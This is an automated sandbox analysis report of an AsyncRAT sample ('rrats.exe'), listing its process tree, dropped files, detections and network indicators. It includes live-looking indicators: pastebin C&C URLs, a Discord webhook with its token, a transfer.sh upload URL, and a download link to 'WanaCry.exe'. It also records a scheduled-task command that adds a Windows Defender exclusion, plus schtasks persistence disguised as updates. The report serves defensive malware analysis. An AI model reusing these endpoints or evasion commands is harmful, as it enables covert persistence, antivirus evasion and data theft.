                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571504 Sample: rrats.exe Startdate: 09/12/2024 Architecture: WINDOWS Score: 100 81 pastebin.com 2->81 99 Found malware configuration 2->99 101 Malicious sample detected (through community Yara rule) 2->101 103 Antivirus / Scanner detection for submitted sample 2->103 107 12 other signatures 2->107 11 rrats.exe 13 2->11         started        14 Explorer.exe 15 4 2->14         started        18 explore.exe 2->18         started        20 cmd.exe 2->20         started        signatures3 105 Connects to a pastebin service (likely for C&C) 81->105 process4 dnsIp5 75 C:\Users\user\AppData\Local\Temp\...\a.exe, PE32 11->75 dropped 22 cmd.exe 1 11->22         started        83 194.67.204.7, 49706, 88 IHOR-ASRU Russian Federation 14->83 85 104.20.4.235, 443, 49914, 49987 CLOUDFLARENETUS United States 14->85 87 pastebin.com 172.67.19.24, 443, 49704, 49705 CLOUDFLARENETUS United States 14->87 77 C:\Users\user\AppData\Local\explore.exe, PE32 14->77 dropped 119 Antivirus detection for dropped file 14->119 121 System process connects to network (likely due to code injection or exploit) 14->121 123 Multi AV Scanner detection for dropped file 14->123 125 Protects its processes via BreakOnTermination flag 14->125 25 cmd.exe 14->25         started        27 cmd.exe 14->27         started        127 Machine Learning detection for dropped file 18->127 129 Adds a directory exclusion to Windows Defender 20->129 29 powershell.exe 20->29         started        31 conhost.exe 20->31         started        file6 signatures7 process8 signatures9 111 Uses schtasks.exe or at.exe to add and modify task schedules 22->111 113 Adds a directory exclusion to Windows Defender 22->113 33 a.exe 9 22->33         started        37 conhost.exe 22->37         started        39 conhost.exe 25->39         started        41 schtasks.exe 25->41         started        43 conhost.exe 27->43         started        45 schtasks.exe 27->45         started        115 Loading BitLocker PowerShell Module 29->115 process10 file11 73 C:\Users\user\AppData\Local\Temp\...\rrat.exe, PE32 33->73 dropped 97 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 33->97 47 rrat.exe 8 33->47         started        signatures12 process13 file14 79 C:\Users\user\AppData\Roamingxplorer.exe, PE32 47->79 dropped 89 Antivirus detection for dropped file 47->89 91 Multi AV Scanner detection for dropped file 47->91 93 Protects its processes via BreakOnTermination flag 47->93 95 3 other signatures 47->95 51 cmd.exe 1 47->51         started        54 cmd.exe 1 47->54         started        56 cmd.exe 1 47->56         started        signatures15 process16 signatures17 109 Adds a directory exclusion to Windows Defender 51->109 58 powershell.exe 23 51->58         started        61 conhost.exe 51->61         started        63 conhost.exe 54->63         started        65 timeout.exe 1 54->65         started        67 Explorer.exe 54->67         started        69 conhost.exe 56->69         started        71 schtasks.exe 1 56->71         started        process18 signatures19 117 Loading BitLocker PowerShell Module 58->117

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        rrats.exe45%ReversingLabsWin32.Trojan.Rastarby
                        rrats.exe100%AviraTR/AVI.AsyncRat.fkvod

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\Explorer.exe100%AviraTR/Dropper.Gen
                        C:\Users\user\AppData\Local\explore.exe100%AviraTR/Dropper.Gen
                        C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe100%AviraTR/Dropper.Gen
                        C:\Users\user\AppData\Roaming\Explorer.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\explore.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe17%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe82%ReversingLabsWin32.Backdoor.AsyncRat
                        C:\Users\user\AppData\Local\explore.exe82%ReversingLabsWin32.Backdoor.AsyncRat
                        C:\Users\user\AppData\Roaming\Explorer.exe82%ReversingLabsWin32.Backdoor.AsyncRat

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://www.w3.or0%Avira URL Cloudsafe
                        https://www.techniknews.net/wp-content/uploads/2018/07/discord-logo.jpg0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        pastebin.com
                        		172.67.19.24
                        		truefalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://pastebin.com/raw/hbwHfEg3false
                            		high
                            https://pastebin.com/raw/hbwHfEg3false
                              		high
                              http://pastebin.com/raw/KKpnJShNfalse
                                		high
                                https://pastebin.com/raw/KKpnJShNfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.techniknews.net/wp-content/uploads/2018/07/discord-logo.jpga.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://cdn.discordapp.com/attachments/903603651585663016/913496700734279730/WanaCry.exea.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.drfalse
                                    		high
                                    http://pastebin.com/raw/hbwHfEg3dExplorer.exe, 00000010.00000002.4490902100.0000000002D0D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CE3000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C42000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.w3.orExplorer.exe, 00000010.00000002.4490902100.0000000002AEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://pastebin.com/raw/hFaPBSUma.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.drfalse
                                        		high
                                        https://dl.teamviewer.com/download/TeamViewer_Setup_x64.exea.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.drfalse
                                          		high
                                          http://pastebin.comdExplorer.exe, 00000010.00000002.4490902100.0000000002D0D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CE3000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C42000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F11000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://transfer.sh/Accounts.txt?a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.drfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://pastebin.comExplorer.exe, 00000010.00000002.4490902100.0000000002D0D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CE3000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B52000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C42000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://pastebin.comExplorer.exe, 00000010.00000002.4490902100.0000000002D0D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CE3000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C42000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://ipv4bot.whatismyipaddress.com/a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.drfalse
                                                      		high
                                                      https://discord.com/api/webhooks/780783005307895818/1tcNqwidYko-32qqkw7-SN35HpBY-1NoZHwFmRnTSgREpOcua.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.drfalse
                                                        		high
                                                        http://pastebin.com/raw/KKpnJShNdExplorer.exe, 00000010.00000002.4490902100.0000000002D0D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CE3000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C42000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://youtu.be/9Ew461CAlmQ?t=10Chttps://youtu.be/xAZMu-qKLxE?t=35a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.drfalse
                                                            		high

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            104.20.4.235
                                                            		unknownUnited States
                                                            		13335CLOUDFLARENETUStrue
                                                            172.67.19.24
                                                            		pastebin.comUnited States
                                                            		13335CLOUDFLARENETUSfalse
                                                            194.67.204.7
                                                            		unknownRussian Federation
                                                            		35196IHOR-ASRUtrue

                                                            General Information

                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1571504
                                                            Start date and time:2024-12-09 14:11:06 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 8m 55s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:30
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:rrats.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.evad.winEXE@43/19@2/3
                                                            EGA Information:
                                                            • Successful, ratio: 66.7%
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 286
                                                            • Number of non-executed functions: 147
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                            • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target Explorer.exe, PID 7412 because it is empty
                                                            • Execution Graph export aborted for target explore.exe, PID 7636 because it is empty
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                            • VT rate limit hit for: rrats.exe

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            08:11:55API Interceptor1x Sleep call for process: rrats.exe modified
                                                            08:11:58API Interceptor30x Sleep call for process: powershell.exe modified
                                                            08:12:10API Interceptor9885412x Sleep call for process: Explorer.exe modified
                                                            14:12:03Task SchedulerRun new task: WindowsUpdater path: "C:\Users\user\AppData\Roaming\Explorer.exe"
                                                            14:12:09Task SchedulerRun new task: WinUpdate path: C:\Users\user\AppData\Local\explore.exe
                                                            14:12:09Task SchedulerRun new task: WinUpdaters path: cmd.exe s>/C powershell Add-MpPreference -ExclusionPath C:"

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            104.20.4.235gabe.ps1Get hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            gaber.ps1Get hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            sostener.vbsGet hashmaliciousNjratBrowse
                                                            • pastebin.com/raw/V9y5Q5vv
                                                            sostener.vbsGet hashmaliciousXWormBrowse
                                                            • pastebin.com/raw/V9y5Q5vv
                                                            envifa.vbsGet hashmaliciousRemcosBrowse
                                                            • pastebin.com/raw/V9y5Q5vv
                                                            New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                                            • pastebin.com/raw/NsQ5qTHr
                                                            172.67.19.24sys_upd.ps1Get hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            cr_asm_menu..ps1Get hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            cr_asm2.ps1Get hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            cr_asm_phshop..ps1Get hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            pastebin.comQ8o0Mx52Fd.exeGet hashmaliciousUnknownBrowse
                                                            • 104.20.3.235
                                                            Q8o0Mx52Fd.exeGet hashmaliciousUnknownBrowse
                                                            • 104.20.3.235
                                                            Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 104.20.4.235
                                                            Microsoft.docGet hashmaliciousUnknownBrowse
                                                            • 104.20.3.235
                                                            a9YMw44iQq.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                            • 172.67.19.24
                                                            nlGOh9K5X5.exeGet hashmaliciousXmrigBrowse
                                                            • 172.67.19.24
                                                            cJ6xbAA5Rn.exeGet hashmaliciousUnknownBrowse
                                                            • 172.67.19.24
                                                            vortex.ps1Get hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                            • 104.20.3.235
                                                            MicrosoftScript.ps1Get hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                            • 172.67.19.24
                                                            msedge.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                            • 104.20.3.235

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            CLOUDFLARENETUShttps://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1Get hashmaliciousHTMLPhisherBrowse
                                                            • 104.21.26.223
                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 172.67.165.166
                                                            https://app.droplet.io/form/yelEz0Get hashmaliciousUnknownBrowse
                                                            • 104.18.16.155
                                                            https://verification.com/omid_error?Get hashmaliciousUnknownBrowse
                                                            • 104.21.19.197
                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 104.21.16.9
                                                            http://doctifyblog.comGet hashmaliciousUnknownBrowse
                                                            • 172.67.136.51
                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                            • 172.67.165.166
                                                            https://www.egencia.com/conversations/cp/connect.html/?id=9445ace5-416d-4fb9-b151-bab0770ccddeGet hashmaliciousUnknownBrowse
                                                            • 104.18.86.42
                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 172.67.165.166
                                                            https://www.steffe.nu/wp-content/plugins/wats/openfl.php?id=tIP6QK9Y1HOngi2nR2btGet hashmaliciousUnknownBrowse
                                                            • 172.67.199.212
                                                            CLOUDFLARENETUShttps://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1Get hashmaliciousHTMLPhisherBrowse
                                                            • 104.21.26.223
                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 172.67.165.166
                                                            https://app.droplet.io/form/yelEz0Get hashmaliciousUnknownBrowse
                                                            • 104.18.16.155
                                                            https://verification.com/omid_error?Get hashmaliciousUnknownBrowse
                                                            • 104.21.19.197
                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 104.21.16.9
                                                            http://doctifyblog.comGet hashmaliciousUnknownBrowse
                                                            • 172.67.136.51
                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                            • 172.67.165.166
                                                            https://www.egencia.com/conversations/cp/connect.html/?id=9445ace5-416d-4fb9-b151-bab0770ccddeGet hashmaliciousUnknownBrowse
                                                            • 104.18.86.42
                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 172.67.165.166
                                                            https://www.steffe.nu/wp-content/plugins/wats/openfl.php?id=tIP6QK9Y1HOngi2nR2btGet hashmaliciousUnknownBrowse
                                                            • 172.67.199.212
                                                            IHOR-ASRUhttp://comprehend-girls.ru/uk_razn_htmlGet hashmaliciousPorn ScamBrowse
                                                            • 93.170.123.244
                                                            SecuriteInfo.com.Trojan.Encoder.3976.32157.17259.exeGet hashmaliciousLockyBrowse
                                                            • 93.170.123.219
                                                            KKdMgqLFjC.msiGet hashmaliciousMatanbuchusBrowse
                                                            • 194.67.193.73
                                                            fBcMVl6ns6.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                            • 185.58.206.164
                                                            rpQF1aDIK4.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                            • 185.58.206.164
                                                            test.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                            • 185.58.206.164
                                                            path.ps1Get hashmaliciousDcRatBrowse
                                                            • 185.58.206.164
                                                            81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                            • 185.58.206.164
                                                            useraccount.aspx.dllGet hashmaliciousMatanbuchusBrowse
                                                            • 194.67.193.13
                                                            Document-21-41-00.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                            • 193.124.185.116

                                                            JA3 Fingerprints

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            3b5074b1b5d032e5620f69f9f700ff0ehttps://app.droplet.io/form/yelEz0Get hashmaliciousUnknownBrowse
                                                            • 172.67.19.24
                                                            TeudA4phjN.exeGet hashmaliciousQuasarBrowse
                                                            • 172.67.19.24
                                                            List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                            • 172.67.19.24
                                                            List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                            • 172.67.19.24
                                                            PYsje7DgYO.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                            • 172.67.19.24
                                                            EcjH6Dq36Y.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                            • 172.67.19.24
                                                            9QwZPBACyK.exeGet hashmaliciousUnknownBrowse
                                                            • 172.67.19.24
                                                            https://www.drvhub.netGet hashmaliciousUnknownBrowse
                                                            • 172.67.19.24
                                                            http://www.sbh.co.uk/Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                            • 172.67.19.24
                                                            jKDBppzWTb.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 172.67.19.24

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Explorer.exe.log

                                                            Download File
                                                            Process:C:\Users\user\AppData\Roaming\Explorer.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):425
